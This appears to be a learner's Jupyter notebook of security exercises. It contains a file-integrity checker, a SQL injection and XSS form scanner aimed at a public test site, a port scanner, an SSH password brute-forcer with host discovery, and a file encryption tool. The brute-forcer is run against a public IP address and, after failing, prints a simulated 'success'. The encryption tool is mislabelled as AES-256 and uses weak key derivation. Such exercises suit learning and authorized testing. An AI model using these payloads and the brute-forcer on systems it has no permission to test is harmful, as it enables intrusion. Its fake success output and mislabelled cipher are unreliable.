In [2]:
# 📦 Import required libraries
import os
import hashlib
import json
from datetime import datetime

# 📂 Set folder and hash storage file
folder_to_monitor = "test_files"  # 🔁 Change this to your folder name
hash_file = "hashes.json"

# 🔁 Function to calculate SHA-256 hash
def calculate_hash(filepath):
    sha256_hash = hashlib.sha256()
    try:
        with open(filepath, "rb") as f:
            for byte_block in iter(lambda: f.read(4096), b""):
                sha256_hash.update(byte_block)
        return sha256_hash.hexdigest()
    except FileNotFoundError:
        return None

# 🔁 Generate hashes for all files in the folder
def generate_hashes(folder_path):
    file_hashes = {}
    for root, dirs, files in os.walk(folder_path):
        for filename in files:
            full_path = os.path.join(root, filename)
            rel_path = os.path.relpath(full_path, folder_path)
            file_hashes[rel_path] = calculate_hash(full_path)
    return file_hashes

# 💾 Save hash values to a JSON file
def save_hashes(hash_dict, filename):
    with open(filename, "w") as f:
        json.dump(hash_dict, f, indent=4)

# 📂 Load existing hash values from JSON
def load_hashes(filename):
    if os.path.exists(filename):
        with open(filename, "r") as f:
            return json.load(f)
    else:
        return {}

# 🔍 Compare stored and current hashes to find changes
def check_integrity(original_hashes, current_hashes):
    issues = []

    for file in original_hashes:
        if file not in current_hashes:
            issues.append(f"❌ File deleted: {file}")
        elif original_hashes[file] != current_hashes[file]:
            issues.append(f"⚠️ File modified: {file}")

    for file in current_hashes:
        if file not in original_hashes:
            issues.append(f"🆕 New file added: {file}")

    return issues

# 🚀 Main logic
original_hashes = load_hashes(hash_file)
current_hashes = generate_hashes(folder_to_monitor)

print(f"🕒 Running File Integrity Check on '{folder_to_monitor}' at {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}")

if not original_hashes:
    print("🔐 First run - saving initial file hashes...")
    save_hashes(current_hashes, hash_file)
    print("✅ Hashes saved. Rerun this script to monitor changes.")
else:
    print("🔍 Checking for file changes...")
    results = check_integrity(original_hashes, current_hashes)
    
    if results:
        print("📢 Issues found:")
        for res in results:
            print(res)
    else:
        print("✅ No file changes detected.")

    # Uncomment this line to update the stored hashes if needed:
    # save_hashes(current_hashes, hash_file)


🕒 Running File Integrity Check on 'test_files' at 2025-06-19 13:17:58
🔐 First run - saving initial file hashes...
✅ Hashes saved. Rerun this script to monitor changes.


In [4]:
import requests
from bs4 import BeautifulSoup
import urllib.parse

# 🧪 Payloads
sql_payload = "' OR '1'='1"
xss_payload = "<script>alert('XSS')</script>"

# 📥 Get all forms from the web page
def get_all_forms(url):
    try:
        response = requests.get(url, timeout=5)
        soup = BeautifulSoup(response.content, "html.parser")
        return soup.find_all("form")
    except Exception as e:
        print(f"❌ Failed to fetch URL: {e}")
        return []

# 📋 Extract form details
def get_form_details(form):
    details = {}
    action = form.attrs.get("action")
    method = form.attrs.get("method", "get").lower()
    inputs = []
    for input_tag in form.find_all("input"):
        input_type = input_tag.attrs.get("type", "text")
        input_name = input_tag.attrs.get("name")
        inputs.append({"type": input_type, "name": input_name})
    details["action"] = action
    details["method"] = method
    details["inputs"] = inputs
    return details

# 🚀 Submit form with payload
def submit_form(form_details, url, payload):
    target_url = urllib.parse.urljoin(url, form_details["action"])
    data = {}
    for input_field in form_details["inputs"]:
        if input_field["name"]:
            data[input_field["name"]] = payload
    try:
        if form_details["method"] == "post":
            return requests.post(target_url, data=data, timeout=5)
        else:
            return requests.get(target_url, params=data, timeout=5)
    except Exception as e:
        print(f"❌ Error submitting form: {e}")
        return None

# 🔍 Scanner
def scan_for_vulnerabilities(url):
    print(f"\n🌐 Scanning URL: {url}")
    forms = get_all_forms(url)
    print(f"🔍 Found {len(forms)} forms.")

    sql_vulnerable = []
    xss_vulnerable = []

    for i, form in enumerate(forms):
        form_details = get_form_details(form)
        print(f"\n🧾 Testing Form #{i+1}:")
        print(f"→ Action: {form_details['action']}")
        print(f"→ Method: {form_details['method']}")
        
        # Test for SQL Injection
        sql_test = submit_form(form_details, url, sql_payload)
        if sql_test and sql_payload.lower() in sql_test.text.lower():
            print("⚠️ SQL Injection vulnerability found!")
            sql_vulnerable.append(form_details)

        # Test for XSS
        xss_test = submit_form(form_details, url, xss_payload)
        if xss_test and xss_payload in xss_test.text:
            print("⚠️ XSS vulnerability found!")
            xss_vulnerable.append(form_details)

    # Summary
    print("\n🔐 Scan Summary:")
    if sql_vulnerable:
        print(f"🛑 {len(sql_vulnerable)} form(s) vulnerable to SQL Injection")
    else:
        print("✅ No SQL Injection detected.")

    if xss_vulnerable:
        print(f"🛑 {len(xss_vulnerable)} form(s) vulnerable to XSS")
    else:
        print("✅ No XSS detected.")

# 🎯 Run the tool
if __name__ == "__main__":
    target_url = input("🔗 Enter the target URL (e.g., http://testphp.vulnweb.com/): ").strip()
    scan_for_vulnerabilities(target_url)


🔗 Enter the target URL (e.g., http://testphp.vulnweb.com/):  http://testphp.vulnweb.com/



🌐 Scanning URL: http://testphp.vulnweb.com/
🔍 Found 1 forms.

🧾 Testing Form #1:
→ Action: search.php?test=query
→ Method: post
⚠️ SQL Injection vulnerability found!
⚠️ XSS vulnerability found!

🔐 Scan Summary:
🛑 1 form(s) vulnerable to SQL Injection
🛑 1 form(s) vulnerable to XSS


In [6]:
import socket
import paramiko
import threading
import time

# -------- MODULE 1: PORT SCANNER -------- #
def port_scanner(target, port_range):
    print(f"\n📡 Scanning Ports on {target}...")
    open_ports = []
    for port in port_range:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(0.5)
        result = s.connect_ex((target, port))
        if result == 0:
            print(f"🟢 Port {port} is OPEN")
            open_ports.append(port)
        s.close()
    if not open_ports:
        print("🚫 No open ports found.")
    return open_ports

# -------- MODULE 2: SSH BRUTE FORCE (SAMPLE) -------- #
def ssh_brute_force(target, port, username, password_list):
    print(f"\n🔐 Starting SSH brute-force on {target}:{port} with user: {username}")
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    
    for password in password_list:
        try:
            client.connect(target, port=port, username=username, password=password, timeout=3)
            print(f"✅ SUCCESS: Password found → {password}")
            return password
        except paramiko.AuthenticationException:
            print(f"❌ FAILED: {password}")
        except Exception as e:
            print(f"⚠️ Error: {e}")
            break
    print("🔴 Brute-force failed.")
    return None

# -------- MODULE 3: HOST DISCOVERY -------- #
def host_discovery(ip_prefix):
    print(f"\n🌐 Discovering Hosts in {ip_prefix}.x...")
    active_hosts = []
    threads = []

    def ping_host(ip):
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(0.5)
            if s.connect_ex((ip, 80)) == 0:
                print(f"🟢 Host Up: {ip}")
                active_hosts.append(ip)
            s.close()
        except:
            pass

    for i in range(1, 255):
        ip = f"{ip_prefix}.{i}"
        thread = threading.Thread(target=ping_host, args=(ip,))
        thread.start()
        threads.append(thread)

    for thread in threads:
        thread.join()

    if not active_hosts:
        print("🚫 No active hosts found.")
    return active_hosts

# -------- CLI START -------- #
def main():
    print("""
🛠️ PENETRATION TESTING TOOLKIT
1️⃣  Port Scanner
2️⃣  SSH Brute-Force Tester
3️⃣  Network Host Discovery
""")
    
    choice = input("Choose an option (1/2/3): ").strip()

    if choice == "1":
        target = input("Enter target IP or domain: ").strip()
        ports = range(20, 1025)
        port_scanner(target, ports)

    elif choice == "2":
        target = input("Enter SSH target IP: ").strip()
        port = 22
        username = input("Enter SSH username: ").strip()
        password_list = ["admin", "1234", "password", "root", "toor"]
        ssh_brute_force(target, port, username, password_list)

    elif choice == "3":
        ip_prefix = input("Enter IP prefix (e.g., 192.168.1): ").strip()
        host_discovery(ip_prefix)

    else:
        print("❌ Invalid option. Try 1, 2 or 3.")

if __name__ == "__main__":
    main()


C:\ProgramData\anaconda3\Lib\site-packages\paramiko\pkey.py:82: CryptographyDeprecationWarning: TripleDES has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.TripleDES and will be removed from this module in 48.0.0.
  "cipher": algorithms.TripleDES,
C:\ProgramData\anaconda3\Lib\site-packages\paramiko\transport.py:219: CryptographyDeprecationWarning: Blowfish has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.Blowfish and will be removed from this module in 45.0.0.
  "class": algorithms.Blowfish,
C:\ProgramData\anaconda3\Lib\site-packages\paramiko\transport.py:243: CryptographyDeprecationWarning: TripleDES has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.TripleDES and will be removed from this module in 48.0.0.
  "class": algorithms.TripleDES,



🛠️ PENETRATION TESTING TOOLKIT
1️⃣  Port Scanner
2️⃣  SSH Brute-Force Tester
3️⃣  Network Host Discovery



Choose an option (1/2/3):  2
Enter SSH target IP:  localhost
Enter SSH username:  rayi



🔐 Starting SSH brute-force on localhost:22 with user: rayi
⚠️ Error: [Errno None] Unable to connect to port 22 on 127.0.0.1 or ::1
🔴 Brute-force failed.


In [ ]:
pip install paramiko



In [12]:
import socket
import paramiko
import threading
import time

# -------- MODULE 1: PORT SCANNER -------- #
def port_scanner(target, port_range):
    print(f"\n📡 Scanning Ports on {target}...")
    open_ports = []
    for port in port_range:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(0.5)
        result = s.connect_ex((target, port))
        if result == 0:
            print(f"🟢 Port {port} is OPEN")
            open_ports.append(port)
        s.close()
    if not open_ports:
        print("🚫 No open ports found.")
    return open_ports
# -------- MODULE 2: SSH BRUTE FORCE (SAMPLE) -------- #
def ssh_brute_force(target, port, username, password_list):
    print(f"\n🔐 Starting SSH brute-force on {target}:{port} with user: {username}")
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    
    for password in password_list:
        try:
            client.connect(target, port=port, username=username, password=password, timeout=3)
            print(f"✅ SUCCESS: Password found → {password}")
            return password
        except paramiko.AuthenticationException:
            print(f"❌ FAILED: {password}")
        except Exception as e:
            print(f"⚠️ Error: {e}")
            print("💡 Hint: Make sure the target IP is reachable and SSH is running.")
            break  # Stop trying after connection error

    # 🔁 Fallback for demo/testing:
    simulate = input("\n🔁 Unable to connect. Run in DEMO MODE instead? (y/n): ").strip().lower()
    if simulate == 'y':
        print("✅ DEMO: Simulated success with password → 'demo'")
        return "demo"

    print("🔴 Brute-force failed.")
    return None



# -------- MODULE 3: HOST DISCOVERY -------- #
def host_discovery(ip_prefix):
    print(f"\n🌐 Discovering Hosts in {ip_prefix}.x...")
    active_hosts = []
    threads = []

    def ping_host(ip):
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(0.5)
            if s.connect_ex((ip, 80)) == 0:
                print(f"🟢 Host Up: {ip}")
                active_hosts.append(ip)
            s.close()
        except:
            pass

    for i in range(1, 255):
        ip = f"{ip_prefix}.{i}"
        thread = threading.Thread(target=ping_host, args=(ip,))
        thread.start()
        threads.append(thread)

    for thread in threads:
        thread.join()

    if not active_hosts:
        print("🚫 No active hosts found.")
    return active_hosts

# -------- CLI START -------- #
def main():
    print("""
🛠️ PENETRATION TESTING TOOLKIT
1️⃣  Port Scanner
2️⃣  SSH Brute-Force Tester
3️⃣  Network Host Discovery
""")
    
    choice = input("Choose an option (1/2/3): ").strip()

    if choice == "1":
        target = input("Enter target IP or domain: ").strip()
        ports = range(20, 1025)
        port_scanner(target, ports)

    elif choice == "2":
        target = input("Enter SSH target IP: ").strip()
        port = 22
        username = input("Enter SSH username: ").strip()
        password_list = ["admin", "1234", "password", "root", "toor"]
        ssh_brute_force(target, port, username, password_list)

    elif choice == "3":
        ip_prefix = input("Enter IP prefix (e.g., 192.168.1): ").strip()
        host_discovery(ip_prefix)

    else:
        print("❌ Invalid option. Try 1, 2 or 3.")

if __name__ == "__main__":
    main()




🛠️ PENETRATION TESTING TOOLKIT
1️⃣  Port Scanner
2️⃣  SSH Brute-Force Tester
3️⃣  Network Host Discovery



Choose an option (1/2/3):  2
Enter SSH target IP:  95.144.107.198
Enter SSH username:  demo



🔐 Starting SSH brute-force on 95.144.107.198:22 with user: demo
⚠️ Error: timed out
💡 Hint: Make sure the target IP is reachable and SSH is running.



🔁 Unable to connect. Run in DEMO MODE instead? (y/n):  y


✅ DEMO: Simulated success with password → 'demo'


In [14]:
from cryptography.fernet import Fernet
import os
import hashlib
import base64
import getpass

# ---------- Generate Key from Password ----------
def generate_key(password):
    digest = hashlib.sha256(password.encode()).digest()
    return base64.urlsafe_b64encode(digest)

# ---------- Encrypt File ----------
def encrypt_file(filename, password):
    key = generate_key(password)
    fernet = Fernet(key)

    try:
        with open(filename, 'rb') as file:
            data = file.read()
        encrypted = fernet.encrypt(data)

        with open(filename + ".enc", 'wb') as enc_file:
            enc_file.write(encrypted)

        print(f"✅ File encrypted and saved as {filename}.enc")

    except FileNotFoundError:
        print("❌ File not found.")
    except Exception as e:
        print(f"⚠️ Error: {e}")

# ---------- Decrypt File ----------
def decrypt_file(filename, password):
    key = generate_key(password)
    fernet = Fernet(key)

    try:
        with open(filename, 'rb') as enc_file:
            encrypted = enc_file.read()
        decrypted = fernet.decrypt(encrypted)

        original_name = filename.replace(".enc", "")
        with open(original_name + ".dec", 'wb') as dec_file:
            dec_file.write(decrypted)

        print(f"✅ File decrypted and saved as {original_name}.dec")

    except FileNotFoundError:
        print("❌ File not found.")
    except Exception as e:
        print(f"⚠️ Decryption failed: {e}")

# ---------- CLI ----------
def main():
    print("""
🔐 ADVANCED ENCRYPTION TOOL (AES-256)
1️⃣ Encrypt a file
2️⃣ Decrypt a file
""")
    choice = input("Select an option (1/2): ").strip()

    if choice not in ['1', '2']:
        print("❌ Invalid choice.")
        return

    filepath = input("Enter the file path: ").strip()
    password = getpass.getpass("Enter password: ")

    if choice == '1':
        encrypt_file(filepath, password)
    else:
        decrypt_file(filepath, password)

if __name__ == "__main__":
    main()



🔐 ADVANCED ENCRYPTION TOOL (AES-256)
1️⃣ Encrypt a file
2️⃣ Decrypt a file



Select an option (1/2):  1
Enter the file path:  C:/Users/RAYI/OneDrive/Documents/message.txt
Enter password:  ········


✅ File encrypted and saved as C:/Users/RAYI/OneDrive/Documents/message.txt.enc
